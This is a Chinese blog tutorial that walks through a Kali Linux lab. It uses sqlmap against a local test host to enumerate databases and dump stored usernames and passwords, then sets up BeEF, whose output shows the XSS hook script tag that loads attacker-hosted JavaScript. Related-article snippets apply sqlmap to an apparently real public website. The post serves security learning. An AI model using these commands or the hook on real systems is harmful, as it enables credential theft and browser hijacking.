2024年最全网络安全:Kali Linux 进行SQL注入与XSS漏洞利用(1),2024年最新最新整理《网络安全架构师面试题解析大全》

最新推荐文章于 2024-07-31 15:29:44 发布
最新推荐文章于 2024-07-31 15:29:44 发布
阅读量369 收藏 7
点赞数 3
分类专栏: 程序员 文章标签: web安全 linux sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84281712/article/details/138477764
版权

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

一、实验

1.环境

2.Kali Linux 进行SQL注入

3.Kali Linux 进行XSS漏洞利用

二、问题

1.XSS分类

2.如何修改beef-xss的密码

3.beef-xss 服务如何管理

4.运行beef报错

5.beef 命令的颜色有哪些区别

6.owasp-top-10 有哪些变化

一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2022.4192.168.204.154(动态)
Windows10192.168.204.10Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)Windows 查看IP地址

ipconfig

(5)Kali主机 ping Windows主机

ping  192.168.204.10

2.Kali Linux 进行SQL注入

(1) LAMP(LNMP)平台

选择Windows版本

https://www.xp.cn/download.html

(2)sqlmap查阅

https://github.com/sqlmapproject/sqlmap

(3)获取服务器信息

包括操作系统、数据库、 web 容器、后端语⾔

sqlmap -u http://192.168.204.10/news/list.php?id=46

(4)获取数据名称列表

–thread 10  线程数设置为10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

(5)获取当前数据库名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

(6)获取当前数据库中所有表的名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

(7)获取当前数据库指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

(8)获取指定库指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

3.Kali Linux 进行XSS漏洞利用

(1)漏洞测试平台

选择Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

(2)kali 系统更新

sudo apt-get update

(3)安装ruby

apt-get install ruby

(4)安装beef

apt-get install beef-xss

(5)启动beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

(6)浏览器登录

http://127.0.0.1:3000/ui/authentication

(7) 输入账号密码

账号输⼊beef,密码输⼊123456

进入系统

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84281712
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
热门推荐
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
kali下的SQL注入(DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2054
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
kali sql注入
zengliguang的专栏
04-27 772
这是Kali Linux中最常用的自动化SQL注入工具之一,支持多种数据库类型,能进行深度扫描、数据提取、数据库管理操作、甚至获取系统权限。: 描述发现的SQL注入漏洞、影响范围、利用方法、获取的数据样本,以及修复建议(如使用参数化查询、输入验证、权限控制等)。: 确定要测试的Web应用或API的URL、请求方法(GET、POST等)、可能的输入参数等信息。: 记录测试过程中发现的注入点、使用的payload、获取的数据等详细信息,为编写报告做准备。等技巧,提取敏感数据如用户信息、密码哈希、系统配置等。
网络安全Kali Linux 进行SQL注入XSS漏洞利用
cronaldo91的博客
03-27 1886
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(5)Kali主机 ping Windows主机。(14)Windows主机弹出登录界面。(7)获取当前数据库指定的表的字段名。(4)Windows 查看IP地址。(6)获取当前数据库中所有表的名称。(8)获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)(15)beef获取账号及密码。(5)启动beef-xss。(9)beef获取目标主机。
kalisql注入
03-19 678
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
使用kali完成sql注入
pray030的博客
12-09 8973
使用kali完成sql注入 本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入 前期准备 1.kali虚拟机(自带sql注入所需工具) 2.能够进行注入的网站 实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个
为什么要学网络安全?如何学习网络安全?这3个理由告诉你(自己整理的50G网安资料)
weixin_72912381的博客
12-08 1744
相信很多小伙伴最近都听说网络安全它很火,那么网络安全它难吗?其实并不难,网络安全入门更简单!可不要被它神秘的外衣给唬住了。只要你接下来认真听完我的讲解,虽然保证不了你能成为大神,但就算你学习能力再差那也能达到入门级别。
自学网络安全:从入门到精通的全面指南
最新发布
weixin_65409651的博客
07-31 389
网络安全,又称信息安全,主要是指保护计算机网络及其信息系统免受非法入侵、破坏、篡改和泄露的技术和措施。随着互联网的普及,网络安全问题日益严重,企业和个人的信息安全面临前所未有的挑战。黑客技术作为网络安全的重要组成部分,既是防御的一环,也是攻击的手段。
2022网络安全技术自学路线图及职业选择方向
欢迎来到技术宅的博客
03-18 1万+
每天都有新闻报道描述着新技术对人们的生活和工作方式带来的巨大乃至压倒性影响。与此同时有关网络攻击和数据泄露的头条新闻也是日益频繁。 攻击者可谓无处不在:企业外部充斥着黑客、有组织的犯罪团体以及民族国家网络间谍,他们的能力和蛮横程度正日渐增长;企业内部是员工和承包商,无论有意与否,他们都可能是造成恶意或意外事件的罪魁祸首。 那作为一个零基础的小白,此时适合进入网络安全行业吗,它的就业前景怎么样,应该怎么选择适合自己的岗位? 本文将针对这几个问题,逐一进行解答,希望能够对大家有帮助。 (友情提示,全文五
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1889
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
kali之使用sqlmap进行sql注入
xv66666的博客
07-26 893
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。4、联合查询注入,可以使用union的情况下的注入。5、堆查询注入,可以同时执行多条语句的执行时的注入。
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 5997
安全等级调为low进入SQL Injection(Blind)页面。
Kali学习笔记39:SQL手工注入(1)
weixin_30670965的博客
02-11 192
终于到了SQL注入 最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞 SQL注入的原理这里就不说了,百度 打开DVWA,SQL注入测试模块 测试单引号,发现出错,于是想到测试语句: 1' or '1'='1 成功: 测试是否存在漏洞: 1' and '1'='1 如果返回数据,但是1' and '1'='0 不返回数据,代表存在sql注入 或者...
kali使用mysql注入攻击_kalisql注入
weixin_30588381的博客
01-18 1697
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 526
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
Kali渗透测试之DVWA系列7——SQL Injection(SQL注入
浅浅的博客
06-13 3834
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
Linux下的SQL注入工具
freemind
07-29 1539
大量的现代企业采用Web应用程序与其客户无缝地连接到一起,但由于不正确的编码,造成了许多安全问题。Web应用程序中的漏洞可使黑客获取对敏感信息(如个人数据、登录信息等)的直接访问。 Web应用程序准许访问者提交数据,并可通过互联网从数据库中检索数据。而数据库是多数Web应用程序的心脏。数据库维持着Web应用程序将特定内容交给访问者的数据,Web应用程序在将信息交给客户、供应商时,也从数据库取
SQL注入-基础步骤(先判断好相关信息,然后使用Kalisqlmap进行注入)
weixin_47696216的博客
11-24 2058
SQL注入基础
Kali Linux最新VM版:网络安全渗透测试利器
Kali Linux 是一款专为网络安全和渗透测试设计的高级Linux发行版,由Offensive Security公司精心打造和持续维护。这个系统因其强大的攻防能力而在业界享有盛誉,是安全专业人士的首选工具,尤其适合进行安全评估和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值